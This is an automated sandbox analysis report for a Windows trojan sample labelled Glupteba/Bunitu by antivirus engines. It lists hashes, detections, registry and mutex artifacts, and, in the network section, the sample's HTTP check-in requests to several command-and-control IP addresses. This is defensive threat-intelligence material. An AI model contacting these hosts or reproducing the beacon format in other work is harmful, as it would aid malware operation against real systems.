Analysis Date2015-09-19 10:00:32
MD53b2486e228f5db6cad7b78194c443d54
SHA101e1daaa79a572645f48af096eeb315e8811188e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
PEhash3c2dc10e4926deac196afcdd9795d6a674a708fa
IMPhashd5457eeea56d0c64e40250d044842848
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Graftor.234950
AVDr. WebBackDoor.Siggen.59488
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Graftor.234950
AVBullGuardGen:Variant.Graftor.234950
AVPadvishno_virus
AVVirusBlokAda (vba32)TrojanProxy.Glupteba
AVCAT (quickheal)no_virus
AVTrend Microno_virus
AVKasperskyTrojan.Win32.Generic
AVZillya!Trojan.Glupteba.Win32.2843
AVEmsisoftGen:Variant.Graftor.234950
AVIkarusTrojan.Win32.Injector
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Trojan.DQBU-7192
AVMalwareBytesTrojan.Bunitu
AVMicroWorld (escan)Gen:Variant.Graftor.234950
AVMicrosoft Security EssentialsTrojan:Win32/Carberp!rfn
AVK7Trojan ( 004cb6451 )
AVBitDefenderGen:Variant.Graftor.234950
AVFortinetW32/Injector.CGIW!tr
AVSymantecTrojan.Gen.2
AVGrisoft (avg)Inject3.LS
AVEset (nod32)Win32/Injector.CGGL
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVAd-AwareGen:Variant.Graftor.234950
AVTwisterTrojan.Injector.CGGL.nbcc
AVAvira (antivir)TR/Inject.sbbeipj
AVMcafeeRDN/Generic.bfr
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝
21150727\\x00
Creates File\Device\Afd\Endpoint
Creates MutexGlobal\MD7H82HHF7EH2D73

Network Details:

HTTP GEThttp://87.117.252.192:51964/stat?uid=100&downlink=1111&uplink=1111&id=001AA23C&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
User-Agent:
HTTP GEThttp://108.162.200.153:17513/stat?uid=100&downlink=1111&uplink=1111&id=001AB651&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
User-Agent:
HTTP GEThttp://82.211.20.226:54127/stat?uid=100&downlink=1111&uplink=1111&id=001AC9E9&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
User-Agent:
HTTP GEThttp://195.191.25.8:40406/stat?uid=100&downlink=1111&uplink=1111&id=001ADD80&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
User-Agent:
HTTP GEThttp://89.19.20.202:36102/stat?uid=100&downlink=1111&uplink=1111&id=001AF118&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
User-Agent:
HTTP GEThttp://202.158.49.22:12410/stat?uid=100&downlink=1111&uplink=1111&id=001B04AF&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
User-Agent:
HTTP GEThttp://87.117.252.192:51964/stat?uid=100&downlink=1111&uplink=1111&id=001B1847&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 87.117.252.192:51964
Flows TCP192.168.1.1:1031 ➝ 87.117.252.192:51964
Flows TCP192.168.1.1:1032 ➝ 108.162.200.153:17513
Flows TCP192.168.1.1:1033 ➝ 82.211.20.226:54127
Flows TCP192.168.1.1:1034 ➝ 195.191.25.8:40406
Flows TCP192.168.1.1:1035 ➝ 89.19.20.202:36102
Flows TCP192.168.1.1:1036 ➝ 202.158.49.22:12410
Flows TCP192.168.1.1:1037 ➝ 87.117.252.192:51964

Raw Pcap

Strings